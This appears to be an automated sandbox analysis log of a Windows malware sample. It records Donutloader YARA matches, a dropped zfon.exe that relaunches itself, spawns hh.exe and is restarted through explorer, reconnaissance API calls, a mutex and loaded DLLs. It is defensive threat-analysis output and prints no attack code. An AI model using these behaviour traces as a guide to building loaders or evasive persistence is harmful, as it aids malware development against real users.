Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F15007_2_000001CDCB8F1500
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB90B5207_2_000001CDCB90B520
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB9222047_2_000001CDCB922204
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F80C07_2_000001CDCB8F80C0
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB9079107_2_000001CDCB907910
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB91711C7_2_000001CDCB91711C
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB91A6D87_2_000001CDCB91A6D8
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB91C6FC7_2_000001CDCB91C6FC
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F2E507_2_000001CDCB8F2E50
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8FADB07_2_000001CDCB8FADB0
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB9175207_2_000001CDCB917520
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F94807_2_000001CDCB8F9480
Source: C:\Windows\explorer.exeCode function: 11_2_03073A0711_2_03073A07
Source: C:\Windows\explorer.exeCode function: 11_2_030735D711_2_030735D7
Source: C:\Windows\explorer.exeCode function: 11_2_0307231F11_2_0307231F
Source: C:\Windows\explorer.exeCode function: 11_2_030744BB11_2_030744BB
Source: C:\Windows\explorer.exeCode function: 11_2_089201B011_2_089201B0
Source: C:\Windows\explorer.exeCode function: 11_2_089261BC11_2_089261BC
Source: C:\Windows\explorer.exeCode function: 11_2_0891FA2411_2_0891FA24
Source: C:\Windows\explorer.exeCode function: 11_2_08917DBC11_2_08917DBC
Source: C:\Windows\explorer.exeCode function: 11_2_089225F011_2_089225F0
Source: C:\Windows\explorer.exeCode function: 11_2_08919E4411_2_08919E44
Source: C:\Windows\explorer.exeCode function: 11_2_08912F2011_2_08912F20
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF7F96EA92026_2_00007FF7F96EA920
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF7F96E79C026_2_00007FF7F96E79C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF7F96EF06026_2_00007FF7F96EF060
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF7F96E6FC026_2_00007FF7F96E6FC0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF7F970217026_2_00007FF7F9702170
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF7F970E5C026_2_00007FF7F970E5C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A93832B826_2_00007FF8A93832B8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9382AE026_2_00007FF8A9382AE0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9357AA826_2_00007FF8A9357AA8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A937895026_2_00007FF8A9378950
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A937816C26_2_00007FF8A937816C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A93581D826_2_00007FF8A93581D8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9356C7426_2_00007FF8A9356C74
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A936341026_2_00007FF8A9363410
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A93844A026_2_00007FF8A93844A0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A93773E026_2_00007FF8A93773E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A938A39E26_2_00007FF8A938A39E
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A937363C26_2_00007FF8A937363C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A937460826_2_00007FF8A9374608
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9364E1026_2_00007FF8A9364E10
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9370E3026_2_00007FF8A9370E30
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A93716F026_2_00007FF8A93716F0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9365E8026_2_00007FF8A9365E80
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A938169C26_2_00007FF8A938169C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A937057026_2_00007FF8A9370570
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A938658026_2_00007FF8A9386580
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A938A39E26_2_00007FF8A938A39E
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A93640E026_2_00007FF8A93640E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9371F1026_2_00007FF8A9371F10
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A937672026_2_00007FF8A9376720
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9355FC826_2_00007FF8A9355FC8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A938A39E26_2_00007FF8A938A39E
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8BFB97CA026_2_00007FF8BFB97CA0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF7F96EA92028_2_00007FF7F96EA920
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF7F96E79C028_2_00007FF7F96E79C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF7F96EF06028_2_00007FF7F96EF060
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF7F96E6FC028_2_00007FF7F96E6FC0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF7F970217028_2_00007FF7F9702170
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF7F970E5C028_2_00007FF7F970E5C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A802895028_2_00007FF8A8028950
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A802816C28_2_00007FF8A802816C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A80081D828_2_00007FF8A80081D8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8007AA828_2_00007FF8A8007AA8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A80332B828_2_00007FF8A80332B8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8032AE028_2_00007FF8A8032AE0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A803A39E28_2_00007FF8A803A39E
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A80273E028_2_00007FF8A80273E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A801341028_2_00007FF8A8013410
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8006C7428_2_00007FF8A8006C74
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A80344A028_2_00007FF8A80344A0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A802057028_2_00007FF8A8020570
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A803658028_2_00007FF8A8036580
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A803A39E28_2_00007FF8A803A39E
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A802460828_2_00007FF8A8024608
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8014E1028_2_00007FF8A8014E10
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8020E3028_2_00007FF8A8020E30
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A802363C28_2_00007FF8A802363C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8015E8028_2_00007FF8A8015E80
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A803169C28_2_00007FF8A803169C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A80216F028_2_00007FF8A80216F0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8021F1028_2_00007FF8A8021F10
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A802672028_2_00007FF8A8026720
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A803A39E28_2_00007FF8A803A39E
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8005FC828_2_00007FF8A8005FC8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A80140E028_2_00007FF8A80140E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8AF887CA028_2_00007FF8AF887CA0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: String function: 00007FF7F96E2520 appears 116 times
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: String function: 00007FF7F96EBF00 appears 36 times
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: String function: 00007FF7F97A3D20 appears 68 times
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2000 -s 456
Source: VJQyKuHEUe.exeStatic PE information: invalid certificate
Source: VJQyKuHEUe.exe, 00000000.00000002.2526972950.00000000008F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs VJQyKuHEUe.exe
Source: VJQyKuHEUe.exe, 00000000.00000002.2527120443.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VJQyKuHEUe.exe
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 6.2.zfon.exe.7ff7f96e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000000.2552109850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.2582901850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.2529216553.000001AB8875C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.4591031165.000001CDCB5B0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000006.00000003.2529019018.000002DC4A449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000006.00000002.2604535605.000002DC4BEE7000.00000008.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal100.evad.winEXE@23/25@5/5
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90F12C0 GetDiskFreeSpaceExW,5_2_00007FF8B90F12C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE45890 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,6_2_000002DC4BE45890
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,7_2_000001CDCB8F6370
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeFile created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314Jump to behavior
Source: C:\Windows\hh.exeMutant created: \Sessions\1\BaseNamedObjects\????
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeMutant created: NULL
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2000
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeMutant created: \Sessions\1\BaseNamedObjects\Blizzard_Scene 0.1_sb
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\eb0edcd1-a01c-464d-a74f-e69c15f1f014Jump to behavior
Source: unknownProcess created: C:\Windows\explorer.exe
Source: VJQyKuHEUe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VJQyKuHEUe.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: VJQyKuHEUe.exeReversingLabs: Detection: 34%
Source: zfon.exeString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: zfon.exeString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: zfon.exeString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: zfon.exeString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: unknownProcess created: C:\Users\user\Desktop\VJQyKuHEUe.exe "C:\Users\user\Desktop\VJQyKuHEUe.exe"
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Windows\hh.exe C:\windows\hh.exe
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2000 -s 456
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2000 -s 92
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: unknownProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: unknownProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: unknownProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe" Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /autJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Windows\hh.exe C:\windows\hh.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe" Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeProcess created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: secur32.dllJump to behavior
